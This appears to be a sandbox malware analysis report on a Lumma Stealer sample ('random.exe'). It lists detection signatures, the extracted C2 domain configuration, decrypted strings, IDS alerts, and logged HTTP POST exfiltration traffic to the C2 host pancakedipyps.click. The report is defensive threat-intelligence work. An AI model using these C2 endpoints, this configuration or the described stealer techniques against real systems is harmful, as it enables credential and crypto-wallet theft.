Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:	random.exe
Analysis ID:	1585859
MD5:	6446a00eb59754e15749af229b0d5217
SHA1:	69c0311f0b121eb378e90a1dd88925c424c1a07b
SHA256:	558fe8c705bbd035f886cc02acee3fdfa50398e74795f62d182e01225d58e2e2
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

random.exe (PID: 6732 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 6446A00EB59754E15749AF229B0D5217)

conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

random.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 6446A00EB59754E15749AF229B0D5217)

random.exe (PID: 6940 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 6446A00EB59754E15749AF229B0D5217)

WerFault.exe (PID: 7160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 140 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["cloudewahsj.shop", "framekgirus.shop", "abruptyopsn.shop", "pancakedipyps.click", "tirepublicerj.shop", "rabidcowse.shop", "nearycrepso.shop", "wholersorie.shop", "noisycuttej.shop"], "Build id": "FATE99--test"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T11:46:57.624092+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	188.114.97.3	443	TCP
2025-01-08T11:46:58.723867+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	188.114.97.3	443	TCP
2025-01-08T11:46:59.832079+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	188.114.97.3	443	TCP
2025-01-08T11:47:02.382077+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	188.114.97.3	443	TCP
2025-01-08T11:47:03.904266+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	188.114.97.3	443	TCP
2025-01-08T11:47:05.131058+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	188.114.97.3	443	TCP
2025-01-08T11:47:06.348119+0100	2028371	3	Unknown Traffic	192.168.2.4	49746	188.114.97.3	443	TCP
2025-01-08T11:47:10.415669+0100	2028371	3	Unknown Traffic	192.168.2.4	49749	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T11:46:58.190213+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	188.114.97.3	443	TCP
2025-01-08T11:46:59.202131+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49733	188.114.97.3	443	TCP
2025-01-08T11:47:10.911021+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49749	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T11:46:58.190213+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49731	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T11:46:59.202131+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49733	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T11:46:57.624092+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49731	188.114.97.3	443	TCP
2025-01-08T11:46:58.723867+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	188.114.97.3	443	TCP
2025-01-08T11:46:59.832079+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49736	188.114.97.3	443	TCP
2025-01-08T11:47:02.382077+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49740	188.114.97.3	443	TCP
2025-01-08T11:47:03.904266+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49742	188.114.97.3	443	TCP
2025-01-08T11:47:05.131058+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49744	188.114.97.3	443	TCP
2025-01-08T11:47:06.348119+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49746	188.114.97.3	443	TCP
2025-01-08T11:47:10.415669+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49749	188.114.97.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T11:46:57.113787+0100	2058397	1	Domain Observed Used for C2 Detected	192.168.2.4	58005	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T11:47:05.600120+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49744	188.114.97.3	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T11:47:06.352320+0100	2843864	1	A Network Trojan was detected	192.168.2.4	49746	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: random.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://pancakedipyps.click:443/apidfmbI	Avira URL Cloud: Label: malware
Source: https://pancakedipyps.click:443/api)	Avira URL Cloud: Label: malware
Source: https://pancakedipyps.click/apiPP	Avira URL Cloud: Label: malware
Source: https://pancakedipyps.click:443/apik	Avira URL Cloud: Label: malware
Source: https://pancakedipyps.click/apiUT	Avira URL Cloud: Label: malware
Source: https://pancakedipyps.click/Z	Avira URL Cloud: Label: malware
Source: https://pancakedipyps.click/la	Avira URL Cloud: Label: malware
Source: https://pancakedipyps.click/bu	Avira URL Cloud: Label: malware

Found malware configuration

Source: 3.2.random.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["cloudewahsj.shop", "framekgirus.shop", "abruptyopsn.shop", "pancakedipyps.click", "tirepublicerj.shop", "rabidcowse.shop", "nearycrepso.shop", "wholersorie.shop", "noisycuttej.shop"], "Build id": "FATE99--test"}

Multi AV Scanner detection for submitted file

Source: random.exe	ReversingLabs: Detection: 65%
Source: random.exe	Virustotal: Detection: 76%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 90.1% probability

Machine Learning detection for sample

Source: random.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: pancakedipyps.click
Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: FATE99--test

Source: C:\Users\user\Desktop\random.exe

Code function: 3_2_00415D89 CryptUnprotectData,

3_2_00415D89

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49749 version: TLS 1.2

Source: random.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Handler.pdbxa source: random.exe
Source:	Binary string: System.Windows.Forms.pdb source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: System.Windows.Forms.pdb(E source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: System.pdb) source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: Handler.pdb source: random.exe, WERD1D7.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: Handler.pdba source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdb source: WERD1D7.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WERD1D7.tmp.dmp.6.dr

Source: C:\Users\user\Desktop\random.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]	3_2_00441816
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov eax, esi	3_2_0043D0D0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]	3_2_0043D0D0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]	3_2_0040C080
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx edx, word ptr [eax]	3_2_004442E0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov word ptr [edx], cx	3_2_00418BA2
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh	3_2_00444C20
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov ecx, edx	3_2_00430F03
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0042F716
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]	3_2_00417054
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]	3_2_0041B021
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_0041B021
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	3_2_004438E0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	3_2_004438F9
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	3_2_004438FB
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]	3_2_00422880
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ebx, bx	3_2_00427885
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	3_2_0041F170
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov dword ptr [ebp-2Ch], eax	3_2_004421E9
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [edi+10h], 00000000h	3_2_004421E9
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ebx, byte ptr [esi]	3_2_0041618C
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	3_2_0041BA52
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov esi, ecx	3_2_0041BA52
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_0041BA52
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	3_2_00402210
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_0043A230
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_00431AF5
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]	3_2_0040B280
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	3_2_00440A90
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]	3_2_00441B50
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [edi], bl	3_2_00409360
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00422370
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0042FB7D
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+edi]	3_2_00408320
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	3_2_00419B30
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	3_2_0041F3E0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_0041B3F2
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov ecx, eax	3_2_0041AB90
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then jmp ecx	3_2_00428C62
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov ecx, eax	3_2_00427C10
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]	3_2_00414C30
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov ecx, eax	3_2_00418492
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx edx, word ptr [ebx]	3_2_0043CD40
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_0042C5E0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_0041B58F
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	3_2_004195B6
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	3_2_004195B6
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov edi, edx	3_2_0043E6E0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx eax, word ptr [edx]	3_2_0043E6E0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov ecx, edx	3_2_00430F4E
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov ecx, edx	3_2_00430F54
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov word ptr [ebx], ax	3_2_0041A770
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	3_2_00407730
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	3_2_00407730
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]	3_2_00427FC0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]	3_2_00427FC0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	3_2_004437D0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]	3_2_0042A7F0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov edx, ecx	3_2_0042A7F0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov ecx, eax	3_2_00427FFD
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov edx, ecx	3_2_0042AF92
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0042AF92
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov edx, ecx	3_2_0042AFB0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058397 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click) : 192.168.2.4:58005 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49733 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49736 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49740 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49746 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49744 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49749 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49733 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49744 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49746 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: pancakedipyps.click
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: pancakedipyps.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=83PVIUVIGUHSL4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18138Host: pancakedipyps.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=52X1V2I4DH724CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8759Host: pancakedipyps.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=97RJBEUIGRL98EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20412Host: pancakedipyps.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BMBE9NGHHGBJRN9PVABUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 988Host: pancakedipyps.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZR3AKJC6S0AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584031Host: pancakedipyps.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: pancakedipyps.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: pancakedipyps.click

Source: unknown

